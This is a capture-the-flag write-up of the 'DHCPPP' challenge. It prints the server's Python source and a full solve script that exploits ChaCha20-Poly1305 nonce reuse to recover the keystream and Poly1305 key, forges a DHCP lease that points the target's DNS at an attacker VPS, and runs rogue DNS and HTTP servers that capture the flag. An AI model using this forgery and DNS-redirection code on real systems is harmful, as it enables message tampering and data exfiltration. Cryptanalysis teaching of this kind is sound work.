DHCPPP
14 minutes to read
We are given the Python source code of the server that has the flag:
import time, zlib
import secrets
import hashlib
import requests
from Crypto.Cipher import ChaCha20_Poly1305
import dns.resolver
CHACHA_KEY = secrets.token_bytes(32)
TIMEOUT = 1e-1
def encrypt_msg(msg, nonce):
# In case our RNG nonce is repeated, we also hash
# the message in. This means the worst-case scenario
# is that our nonce reflects a hash of the message
# but saves the chance of a nonce being reused across
# different messages
nonce = sha256(msg[:32] + nonce[:32])[:12]
cipher = ChaCha20_Poly1305.new(key=CHACHA_KEY, nonce=nonce)
ct, tag = cipher.encrypt_and_digest(msg)
return ct+tag+nonce
def decrypt_msg(msg):
ct = msg[:-28]
tag = msg[-28:-12]
nonce = msg[-12:]
cipher = ChaCha20_Poly1305.new(key=CHACHA_KEY, nonce=nonce)
pt = cipher.decrypt_and_verify(ct, tag)
return pt
def calc_crc(msg):
return zlib.crc32(msg).to_bytes(4, "little")
def sha256(msg):
return hashlib.sha256(msg).digest()
RNG_INIT = secrets.token_bytes(512)
class DHCPServer:
def __init__(self):
self.leases = []
self.ips = [f"192.168.1.{i}" for i in range(3, 64)]
self.mac = bytes.fromhex("1b 7d 6f 49 37 c9")
self.gateway_ip = "192.168.1.1"
self.leases.append(("192.168.1.2", b"rngserver_0", time.time(), []))
def get_lease(self, dev_name):
if len(self.ips) != 0:
ip = self.ips.pop(0)
self.leases.append((ip, dev_name, time.time(), []))
else:
# relinquish the oldest lease
old_lease = self.leases.pop(0)
ip = old_lease[0]
self.leases.append((ip, dev_name, time.time(), []))
pkt = bytearray(
bytes([int(x) for x in ip.split(".")]) +
bytes([int(x) for x in self.gateway_ip.split(".")]) +
bytes([255, 255, 255, 0]) +
bytes([8, 8, 8, 8]) +
bytes([8, 8, 4, 4]) +
dev_name +
b"\x00"
)
pkt = b"\x02" + encrypt_msg(pkt, self.get_entropy_from_lavalamps()) + calc_crc(pkt)
return pkt
def get_entropy_from_lavalamps(self):
# Get entropy from all available lava-lamp RNG servers
# Falling back to local RNG if necessary
entropy_pool = RNG_INIT
for ip, name, ts, tags in self.leases:
if b"rngserver" in name:
try:
# get entropy from the server
output = requests.get(f"http://{ip}/get_rng", timeout=TIMEOUT).text
entropy_pool += sha256(output.encode())
except:
# if the server is broken, get randomness from local RNG instead
entropy_pool += sha256(secrets.token_bytes(512))
return sha256(entropy_pool)
def process_pkt(self, pkt):
assert pkt is not None
src_mac = pkt[:6]
dst_mac = pkt[6:12]
msg = pkt[12:]
if dst_mac != self.mac:
return None
if src_mac == self.mac:
return None
if len(msg) and msg.startswith(b"\x01"):
# lease request
dev_name = msg[1:]
lease_resp = self.get_lease(dev_name)
return (
self.mac +
src_mac + # dest mac
lease_resp
)
else:
return None
class FlagServer:
def __init__(self, dhcp):
self.mac = bytes.fromhex("53 79 82 b5 97 eb")
self.dns = dns.resolver.Resolver()
self.process_pkt(dhcp.process_pkt(self.mac+dhcp.mac+b"\x01"+b"flag_server"))
def send_flag(self):
with open("flag.txt", "r") as f:
flag = f.read().strip()
curl("example.com", f"/{flag}", self.dns)
def process_pkt(self, pkt):
assert pkt is not None
src_mac = pkt[:6]
dst_mac = pkt[6:12]
msg = pkt[12:]
if dst_mac != self.mac:
return None
if src_mac == self.mac:
return None
if len(msg) and msg.startswith(b"\x02"):
# lease response
pkt = msg[1:-4]
pkt = decrypt_msg(pkt)
crc = msg[-4:]
assert crc == calc_crc(pkt)
self.ip = ".".join(str(x) for x in pkt[0:4])
self.gateway_ip = ".".join(str(x) for x in pkt[4:8])
self.subnet_mask = ".".join(str(x) for x in pkt[8:12])
self.dns1 = ".".join(str(x) for x in pkt[12:16])
self.dns2 = ".".join(str(x) for x in pkt[16:20])
self.dns.nameservers = [self.dns1, self.dns2]
assert pkt.endswith(b"\x00")
print("[FLAG SERVER] [DEBUG] Got DHCP lease", self.ip, self.gateway_ip, self.subnet_mask, self.dns1, self.dns2)
return None
elif len(msg) and msg.startswith(b"\x03"):
# FREE FLAGES!!!!!!!
self.send_flag()
return None
else:
return None
def curl(url, path, dns):
ip = str(dns.resolve(url).response.resolve_chaining().answer).strip().split(" ")[-1]
url = "http://" + ip
print(f"Sending flage to {url}")
requests.get(url + path)
if __name__ == "__main__":
dhcp = DHCPServer()
flagserver = FlagServer(dhcp)
while True:
pkt = bytes.fromhex(input("> ").replace(" ", "").strip())
out = dhcp.process_pkt(pkt)
if out is not None:
print(out.hex())
out = flagserver.process_pkt(pkt)
if out is not None:
print(out.hex())
Source code analysis
The server allows us to connect using a TCP connection, and we are asked to send a packet:
if __name__ == "__main__":
dhcp = DHCPServer()
flagserver = FlagServer(dhcp)
while True:
pkt = bytes.fromhex(input("> ").replace(" ", "").strip())
out = dhcp.process_pkt(pkt)
if out is not None:
print(out.hex())
out = flagserver.process_pkt(pkt)
if out is not None:
print(out.hex())
The packet we send is processed by both DHCPServer
and FlagServer
, and the response (if any) is printed out.
Analysis of FlagServer
Inside the constructor, we see that it defines a MAC address and uses a dns
object to resolve URLs. Then, it sends a packet to DHCPServer
:
class FlagServer:
def __init__(self, dhcp):
self.mac = bytes.fromhex("53 79 82 b5 97 eb")
self.dns = dns.resolver.Resolver()
self.process_pkt(dhcp.process_pkt(self.mac+dhcp.mac+b"\x01"+b"flag_server"))
The flag is sent whenever `FlagServer` receives a packet whose message part starts with `\x03`:
def send_flag(self):
with open("flag.txt", "r") as f:
flag = f.read().strip()
curl("example.com", f"/{flag}", self.dns)
def process_pkt(self, pkt):
assert pkt is not None
src_mac = pkt[:6]
dst_mac = pkt[6:12]
msg = pkt[12:]
if dst_mac != self.mac:
return None
if src_mac == self.mac:
return None
# ...
elif len(msg) and msg.startswith(b"\x03"):
# FREE FLAGES!!!!!!!
self.send_flag()
return None
else:
return None
def curl(url, path, dns):
ip = str(dns.resolve(url).response.resolve_chaining().answer).strip().split(" ")[-1]
url = "http://" + ip
print(f"Sending flage to {url}")
requests.get(url + path)
As can be seen, the flag is sent to `http://example.com/<flag>`. Notice that the domain `example.com` is resolved using the `dns` object. Therefore, the objective is to control the nameservers of that `dns` object, so that we can make `example.com` resolve to an IP address controlled by us.
Indeed, a message that starts with \x02
can be used to change the dns
settings for the nameservers:
if len(msg) and msg.startswith(b"\x02"):
# lease response
pkt = msg[1:-4]
pkt = decrypt_msg(pkt)
crc = msg[-4:]
assert crc == calc_crc(pkt)
self.ip = ".".join(str(x) for x in pkt[0:4])
self.gateway_ip = ".".join(str(x) for x in pkt[4:8])
self.subnet_mask = ".".join(str(x) for x in pkt[8:12])
self.dns1 = ".".join(str(x) for x in pkt[12:16])
self.dns2 = ".".join(str(x) for x in pkt[16:20])
self.dns.nameservers = [self.dns1, self.dns2]
assert pkt.endswith(b"\x00")
print("[FLAG SERVER] [DEBUG] Got DHCP lease", self.ip, self.gateway_ip, self.subnet_mask, self.dns1, self.dns2)
return None
However, we cannot send this message directly because the payload part of the packet is supposed to be encrypted.
Analysis of DHCPServer
This class is very similar to FlagServer
. This is the constructor:
class DHCPServer:
def __init__(self):
self.leases = []
self.ips = [f"192.168.1.{i}" for i in range(3, 64)]
self.mac = bytes.fromhex("1b 7d 6f 49 37 c9")
self.gateway_ip = "192.168.1.1"
self.leases.append(("192.168.1.2", b"rngserver_0", time.time(), []))
It basically defines some IP addresses, a MAC address and other stuff.
This is the function that processes incoming packets:
def process_pkt(self, pkt):
assert pkt is not None
src_mac = pkt[:6]
dst_mac = pkt[6:12]
msg = pkt[12:]
if dst_mac != self.mac:
return None
if src_mac == self.mac:
return None
if len(msg) and msg.startswith(b"\x01"):
# lease request
dev_name = msg[1:]
lease_resp = self.get_lease(dev_name)
return (
self.mac +
src_mac + # dest mac
lease_resp
)
else:
return None
As can be seen, the message part must start with \x01
, and the content is dev_name
, which is passed to get_lease
. The response is sent back, along with MAC addresses.
This is get_lease
:
def get_lease(self, dev_name):
if len(self.ips) != 0:
ip = self.ips.pop(0)
self.leases.append((ip, dev_name, time.time(), []))
else:
# relinquish the oldest lease
old_lease = self.leases.pop(0)
ip = old_lease[0]
self.leases.append((ip, dev_name, time.time(), []))
pkt = bytearray(
bytes([int(x) for x in ip.split(".")]) +
bytes([int(x) for x in self.gateway_ip.split(".")]) +
bytes([255, 255, 255, 0]) +
bytes([8, 8, 8, 8]) +
bytes([8, 8, 4, 4]) +
dev_name +
b"\x00"
)
pkt = b"\x02" + encrypt_msg(pkt, self.get_entropy_from_lavalamps()) + calc_crc(pkt)
return pkt
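Basically, the server takes an IP address from the `ips` list (or, once that list is empty, reuses the address of the oldest lease), appends a new entry with `dev_name` to the `leases` list and uses the address to build the packet. Afterwards, the packet is encrypted, with the output of `get_entropy_from_lavalamps` mixed into the nonce (the key is the fixed `CHACHA_KEY`), and a CRC32 of the plaintext is appended at the end: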
def get_entropy_from_lavalamps(self):
# Get entropy from all available lava-lamp RNG servers
# Falling back to local RNG if necessary
entropy_pool = RNG_INIT
for ip, name, ts, tags in self.leases:
if b"rngserver" in name:
try:
# get entropy from the server
output = requests.get(f"http://{ip}/get_rng", timeout=TIMEOUT).text
entropy_pool += sha256(output.encode())
except:
# if the server is broken, get randomness from local RNG instead
entropy_pool += sha256(secrets.token_bytes(512))
return sha256(entropy_pool)
Here we see that if no lease name contains `rngserver`, the result will always be the same (the SHA256 hash of `RNG_INIT`, which is unknown but fixed for the lifetime of the process):
RNG_INIT = secrets.token_bytes(512)
Cipher analysis
These are the functions to encrypt and decrypt:
CHACHA_KEY = secrets.token_bytes(32)
def encrypt_msg(msg, nonce):
# In case our RNG nonce is repeated, we also hash
# the message in. This means the worst-case scenario
# is that our nonce reflects a hash of the message
# but saves the chance of a nonce being reused across
# different messages
nonce = sha256(msg[:32] + nonce[:32])[:12]
cipher = ChaCha20_Poly1305.new(key=CHACHA_KEY, nonce=nonce)
ct, tag = cipher.encrypt_and_digest(msg)
return ct+tag+nonce
def decrypt_msg(msg):
ct = msg[:-28]
tag = msg[-28:-12]
nonce = msg[-12:]
cipher = ChaCha20_Poly1305.new(key=CHACHA_KEY, nonce=nonce)
pt = cipher.decrypt_and_verify(ct, tag)
return pt
The server is using ChaCha20-Poly1305. The vulnerability here is a nonce reuse. Notice that the nonce is the first 12 bytes of a SHA256 hash of `msg[:32] + nonce[:32]`. The `nonce` parameter of `encrypt_msg` is the result of `get_entropy_from_lavalamps`, which is always the same once no `rngserver` lease is left. Therefore, if we force `msg[:32]` (the 20-byte lease header plus the first 12 bytes of `dev_name`) to be the same in two requests, we will have a nonce-reuse situation.
Solution
We will need to analyze how ChaCha20-Poly1305 works under the hood.
Basically, it is a stream cipher (ChaCha20) combined with a Poly1305 message authentication code.
The use of a stream cipher alone is not safe when you know part of the plaintext, because we can use XOR to get the key stream.
This time, we cannot simply do this because we have Poly1305. So, we need to find a way to generate a valid tag for the encrypted message we want to send to FlagServer
Poly1305 nonce reuse
The way Poly1305 works is by creating a polynomial over the field $\mathbb{F}_p$, where $p = 2^{130} - 5$, which is a prime number.
$$ P(x) = c_1 x^q + c_2 x^{q - 1} + \dots + c_q x \mod{p} $$
Where each coefficient $c_i$ is a 16-byte block of the message to be authenticated, read as a little-endian integer with an extra `0x01` byte appended. And the tag is generated as:
$$ \mathrm{tag} = \left(P(r) + s\right) \mod{2^{128}} $$
Where $r$ and $s$ are secret key values.
There are some omitted nuances of the cipher, but the key concept of the nonce-reuse attack is that we can get two different tags of two different messages that have the same $r$ and $s$ values because they depend on the key (which is always the same) and the nonce (which we can force to be the same).
As a result, we have
$$ \begin{cases} \mathrm{tag} = \left((c_1 r^q + c_2 r^{q - 1} + \dots + c_q r \mod{p}) + s\right) \mod{2^{128}} \\ \mathrm{tag}' = \left((c'_1 r^q + c'_2 r^{q - 1} + \dots + c'_q r \mod{p}) + s\right) \mod{2^{128}} \end{cases} $$
If we subtract both expressions, we can get rid of $s$:
$$ \mathrm{tag} - \mathrm{tag}' = \left((c_1 - c'_1) r^q + (c_2 - c'_2) r^{q - 1} + \dots + (c_q - c'_q) r \mod{p}\right) \mod{2^{128}} $$
Further, we can get rid of $\mod{2^{128}}$ by adding $k \cdot 2^{128}$ for $-4 \leqslant k \leqslant 4$:
$$ \mathrm{tag} - \mathrm{tag}' + k \cdot 2^{128} = \left((c_1 - c'_1) r^q + (c_2 - c'_2) r^{q - 1} + \dots + (c_q - c'_q) r \mod{p}\right) $$
The value of $k$ is in that range because each polynomial evaluation is first reduced modulo $p = 2^{130} - 5$, so the difference of the two evaluations lies strictly between $-p$ and $p$ with $p < 4 \cdot 2^{128}$, while $\mathrm{tag} - \mathrm{tag}'$ lies strictly between $-2^{128}$ and $2^{128}$.
Therefore, we can test these values for $k$ and, for each of them, get candidates for $r$ by finding the roots of the polynomial with coefficients $c_i - c'_i$.
Once we get the value of $r$, getting $s$ is trivial:
$$ s = \left(\mathrm{tag} - \left(c_1 r^q + c_2 r^{q - 1} + \dots + c_q r \mod{p}\right)\right) \mod{2^{128}} $$
At this point, we will be able to encrypt any message and authenticate it correctly, so we will be able to modify the nameservers of the dns
object and get the flag.
Implementation
I will use these helper functions to send/receive packets to/from the DHCPServer
:
def send_recv(data: bytes) -> bytes:
    """Send one packet to the challenge and return the decoded reply.

    The packet is hex-encoded and written after the ``> `` prompt of the
    module-level ``io`` tube; the next received line is parsed as hex.
    """
    hex_payload = data.hex().encode()
    io.sendlineafter(b'> ', hex_payload)
    reply_line = io.recvline().decode()
    return bytes.fromhex(reply_line)
def parse_enc(enc: bytes):
    """Split an encrypted blob laid out as ``ct || tag || nonce``.

    The trailing 12 bytes are the nonce, the 16 bytes before them are the
    Poly1305 tag, and whatever precedes those is the ciphertext.

    Returns:
        A ``(ct, tag, nonce)`` tuple.
    """
    body, nonce = enc[:-12], enc[-12:]
    return body[:-16], body[-16:], nonce
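First of all, we empty the `ips` list, in order to have more control over the IP address of the leases: once it is empty, the next request evicts the oldest lease, which is `rngserver_0` (192.168.1.2), so from then on the entropy is constant. Then, we force the nonce-reuse situation (we need the IP addresses to be the same, which is why we need $64 - 3$ more queries until 192.168.1.2 is handed out again) using the same first 12 bytes in `dev_name`: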
io = get_process()

DHCP_MAC = bytes.fromhex('1b 7d 6f 49 37 c9')
FLAG_MAC = bytes.fromhex('53 79 82 b5 97 eb')


def request_lease(suffix: bytes = b'') -> bytes:
    """Request a lease for the device name ``b'A' * 12 + suffix``."""
    return send_recv(b'\0' * 6 + DHCP_MAC + b'\x01' + b'A' * 12 + suffix)


def split_frame(frame: bytes):
    """Return the two 6-byte MAC fields and the message part of a frame."""
    return frame[:6], frame[6:12], frame[12:]


# The server starts with 61 free addresses and hands one to the flag server
# at start-up, so 60 requests empty the free list.
for _ in range(3, 64 - 1):
    request_lease()

# With the free list empty, this request evicts the oldest lease, which is
# rngserver_0 at 192.168.1.2; from now on the entropy input is constant.
data1 = request_lease(b'B')

# Cycle through the 61 older leases so that 192.168.1.2 is handed out again.
for _ in range(3, 64):
    request_lease()
data2 = request_lease(b'C')

dst1, src1, lease1 = split_frame(data1)
dst2, src2, lease2 = split_frame(data2)

# Both replies must be lease responses (type byte 0x02).
assert lease1[0] == lease2[0] == 2

# Drop the type byte in front and the 4-byte CRC at the end.
ct1, tag1, nonce1 = parse_enc(lease1[1:-4])
ct2, tag2, nonce2 = parse_enc(lease2[1:-4])

# Same IP, same first 12 name bytes, same entropy => same nonce.
assert nonce1 == nonce2
At this point, we have two different messages ct1
and ct2
with the same nonce.
We can easily get the stream cipher key stream using XOR and a known plaintext:
# Rebuild the plaintext of the first captured lease in the layout used by the
# server's get_lease(): IP, gateway, netmask, two DNS servers, device name and
# a terminating NUL byte.
pkt = bytearray(
# leased address: 192.168.1.2, taken over from the evicted rngserver_0 lease
bytes([int(x) for x in '192.168.1.2'.split('.')]) +
# gateway address
bytes([int(x) for x in '192.168.1.1'.split('.')]) +
# subnet mask
bytes([255, 255, 255, 0]) +
# the two default DNS servers
bytes([8, 8, 8, 8]) +
bytes([8, 8, 4, 4]) +
# device name sent in the request that produced data1
b'A' * 12 + b'B' +
b'\0'
)
# The ciphertext of a stream cipher has exactly the plaintext's length.
assert len(ct1) == len(pkt)
# ciphertext XOR known plaintext = ChaCha20 key stream for this nonce
key_stream = xor(ct1, pkt)
Next, we are going to convert the ciphertexts that will be authenticated to the format required by Poly1305 (take a look at pycryptodome for more details):
def update(msg):
    """Build the byte string that ChaCha20-Poly1305 authenticates for ``msg``.

    With no associated data, the MAC input is the ciphertext zero-padded to a
    multiple of 16 bytes, followed by the associated-data length (0) and the
    ciphertext length, each as an 8-byte little-endian integer.

    Args:
        msg: The ciphertext (without tag and nonce).

    Returns:
        The padded MAC input; its length is always a multiple of 16.
    """
    # (-len) % 16 is 0 for already-aligned input. The former
    # 16 - (len & 0x0F) appended a spurious full block of zeros in that case.
    padding = b'\0' * (-len(msg) % 16)
    aad_length = (0).to_bytes(8, 'little')
    ct_length = len(msg).to_bytes(8, 'little')
    return msg + padding + aad_length + ct_length
msg1 = update(ct1)
msg2 = update(ct2)
At this point, we can use a symbolic variable $r$ and compute the polynomials for the two tags (it is adapted from python-poly1305):
# Tags are 128-bit little-endian integers.
result1 = int.from_bytes(tag1, 'little')
result2 = int.from_bytes(tag2, 'little')

# Poly1305 works in the prime field of order 2^130 - 5.
mod1305 = (1 << 130) - 5
r_sym = PolynomialRing(GF(mod1305), 'r').gens()[0]


def poly1305_polynomial(msg, r):
    """Return the Poly1305 accumulator of ``msg`` evaluated at ``r``.

    ``r`` may be a number or the symbolic generator ``r_sym``; in the latter
    case the result is a polynomial in ``r``.
    """
    tot = 0
    for offset in range(0, len(msg), 16):
        # Each block gets a 0x01 byte appended and is read as little-endian.
        sub = msg[offset:offset + 16] + b'\x01'
        sub += (17 - len(sub)) * b'\0'
        tot = (tot + int.from_bytes(sub, 'little')) * r
    return tot


tot1 = poly1305_polynomial(msg1, r_sym)
tot2 = poly1305_polynomial(msg2, r_sym)
Once here, we can test the different $k$ values and find the roots of the polynomials. Poly1305 clamps $r$ (`r &= 0x0ffffffc0ffffffc0ffffffc0fffffff`), so its top four bits are always zero and the $r$ we are looking for is at most a 124-bit integer, which is useful to discard other roots:
# Poly1305 clamps r: only the bits set in this mask can be non-zero.
R_CLAMP_MASK = 0x0ffffffc0ffffffc0ffffffc0fffffff

# Collect the roots of the tag-difference polynomial for every possible
# multiple of 2^128 lost by the final reduction.
difference = tot1 - tot2 - (result1 - result2)
possible_r = set()
for k in range(-4, 4 + 1):
    for root, _mult in (difference + k * 2 ** 128).roots():
        possible_r.add(int(root))


def reproduces_both_tags(candidate):
    """Check that ``candidate`` and the ``s`` it implies yield both tags."""
    s_candidate = (result1 - int(tot1.subs({r_sym: candidate}))) % 2 ** 128
    tag2_candidate = (int(tot2.subs({r_sym: candidate})) + s_candidate) % 2 ** 128
    return tag2_candidate == result2


# Keep only roots that are valid clamped values and explain both captured
# tags. Sorting makes the choice independent of set iteration order.
candidates = sorted(
    cand for cand in possible_r
    if (cand & ~R_CLAMP_MASK) == 0 and reproduces_both_tags(cand)
)
if not candidates:
    # Previously the loop fell through and silently kept an arbitrary root.
    raise ValueError('no Poly1305 r candidate reproduces both captured tags')
r = candidates[0]
So, we have $r$ and $s$:
s = (result1 - int(tot1.subs({r_sym: r}))) % (2 ** 128)
io.info(f'{r = }')
io.info(f'{s = }')
At this point, we can forge any encrypted message with a valid authentication tag:
def forge(msg, r, s):
    """Compute the Poly1305 tag of ``msg`` under the one-time key ``(r, s)``.

    Args:
        msg: The MAC input (for ChaCha20-Poly1305, the output of ``update``).
        r: The clamped multiplier, as an integer.
        s: The 128-bit additive part of the key, as an integer.

    Returns:
        The 16-byte tag, little-endian.
    """
    p = (1 << 130) - 5
    tot = 0
    for offset in range(0, len(msg), 16):
        # Each block gets a 0x01 byte appended and is read as little-endian.
        sub = msg[offset:offset + 16] + b'\x01'
        sub += (17 - len(sub)) * b'\0'
        tot = (tot + int.from_bytes(sub, 'little')) * r % p
    result = (tot + s) % (1 << 128)
    # Fixed width: a variable-length encoding drops the high zero bytes and
    # produces a tag shorter than 16 bytes for roughly 1 in 256 messages.
    return result.to_bytes(16, 'little')
assert tag1 == forge(update(ct1), r, s)
assert tag2 == forge(update(ct2), r, s)
Finally, we can encrypt the message to modify the nameservers of FlagServer
:
# Build the lease response we want FlagServer to accept. Only the two DNS
# fields matter for the attack; FlagServer installs them as its nameservers.
pkt = bytearray(
# leased address and gateway: arbitrary values
bytes([127, 0, 0, 1]) +
bytes([0, 0, 0, 0]) +
# subnet mask
bytes([255, 255, 255, 0]) +
# both DNS servers point at our own machine
bytes(int(x) for x in VPS_IP.split('.')) +
bytes(int(x) for x in VPS_IP.split('.')) +
# 13-byte name: same total length as the captured lease whose key stream we hold
b'A' * 12 + b'X' +
# FlagServer asserts that the plaintext ends with a NUL byte
b'\0'
)
# FlagServer compares this CRC against the CRC of the decrypted plaintext.
crc = calc_crc(pkt)
# Encrypt with the recovered key stream and authenticate with the recovered key.
ct = xor(pkt, key_stream)
tag = forge(update(ct), r, s)
# The nonce travels inside the packet, so we replay the captured one.
data = b'\0' * 6 + FLAG_MAC + b'\x02' + (ct + tag + nonce1) + crc
io.sendlineafter(b'> ', data.hex().encode())
# FlagServer prints a debug line once the lease has been accepted.
assert b'DEBUG' in io.recvline()
If everything goes well, we can send the message that starts with \x03
and wait for the flag to arrive:
# A message starting with 0x03 makes FlagServer send the flag over HTTP.
data = b'\0' * 6 + FLAG_MAC + b'\x03'
io.sendlineafter(b'> ', data.hex().encode())

# `done` is set by the HTTP handler thread once the flag request arrives.
# Sleep between polls instead of spinning a CPU core in a tight loop.
while not done:
    sleep(0.1)

io.close()
# The DNS and HTTP server threads are still running; exit the process directly.
os._exit(0)
DNS and HTTP servers
Both DNS (nserver
) and HTTP (Flask) servers are implemented in the same script and run in the background using threads:
# Set to True by the HTTP handler once the flag has been received.
done = False
VPS_IP = '12.34.56.78'

# DNS server that answers on every interface, port 53, with logging silenced.
dns_settings = Settings(
    console_log_level=logging.FATAL,
    server_address='0.0.0.0',
    server_port=53,
)
dns_server = NameServer('dns', dns_settings)

# HTTP server that receives the flag; request log and start-up banner disabled.
http_server = Flask('http')
logging.getLogger('werkzeug').disabled = True
sys.modules['flask.cli'].show_server_banner = lambda *_: None


@dns_server.rule('example.com', ['A'])
def example_a_records(query: Query):
    """Answer A queries for example.com with our own address."""
    return A(query.name, VPS_IP)


@http_server.route('/<flag>')
def flag(flag):
    """Log the requested path (the flag) and signal the main thread."""
    global done
    log.success(flag)
    sleep(1)
    done = True
    return '', 200


# Run both servers in background threads, DNS first.
Thread(target=dns_server.run, args=()).start()
Thread(target=http_server.run, kwargs={'host': '0.0.0.0', 'port': 80}).start()
Flag
If we execute the script and everything works fine, we will get the flag:
$ python3 solve.py dhcppp.chal.pwni.ng 1337
[+] Opening connection to dhcppp.chal.pwni.ng on port 1337: Done
[*] r = 212311510927065049612449277573465294
[*] s = 245714001342194252468026868232236808134
[+] PCTF{d0nt_r3u5e_th3_n0nc3_d4839ed727736624}
[*] Closed connection to dhcppp.chal.pwni.ng port 1337
The full script can be found in here: solve.py
.